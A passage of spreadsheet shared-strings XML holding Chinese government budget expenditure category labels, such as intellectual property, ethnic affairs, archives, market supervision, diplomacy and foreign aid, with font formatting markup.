      <t>其他商贸事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>知识产权事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专利审批</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>知识产权战略和规划</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际合作与交流</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>知识产权宏观管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>商标管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>原产地地理标志管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他知识产权事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民族事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民族工作专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他民族事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>港澳台事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>港澳事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>台湾事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他港澳台事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>档案事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>档案馆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他档案事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民主党派及工商联事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他民主党派及工商联事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>群众团体事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工会事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他群众团体事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>党委办公厅</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>室</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>及相关机构事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他党委办公厅</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>室</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>及相关机构事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>组织事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公务员事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他组织事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>宣传事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>宣传管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他宣传事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>统战事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>宗教事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>华侨事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他统战事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外联络事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他对外联络事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他共产党事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他共产党事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>网信事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>信息安全事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他网信事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>市场监督管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>市场主体管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>市场秩序执法</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>质量基础</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>药品事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医疗器械事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>化妆品事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>质量安全监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>食品安全监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他市场监督管理事务</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  社会工作事务</t>
  </si>
  <si>
    <t xml:space="preserve">   专项业务</t>
  </si>
  <si>
    <t xml:space="preserve">   其他社会工作事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">  信访事务</t>
  </si>
  <si>
    <t xml:space="preserve">   行政运行</t>
  </si>
  <si>
    <t xml:space="preserve">   信访业务</t>
  </si>
  <si>
    <t xml:space="preserve">   其他信访事务支出</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他一般公共服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家赔偿费用支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他一般公共服务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>外交支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>外交管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他外交管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>驻外机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>驻外使领馆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>团、处</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他驻外机构支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外援助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>援外优惠贷款贴息</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外援助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际组织</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际组织会费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际组织捐赠</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>维和摊款</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际组织股金及基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国际组织支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外合作与交流</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>在华国际会议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际交流活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外合作活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他对外合作与交流支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外宣传</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对外宣传</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>边界勘界联检</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>边界勘界</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>边界联检</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>边界界桩维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
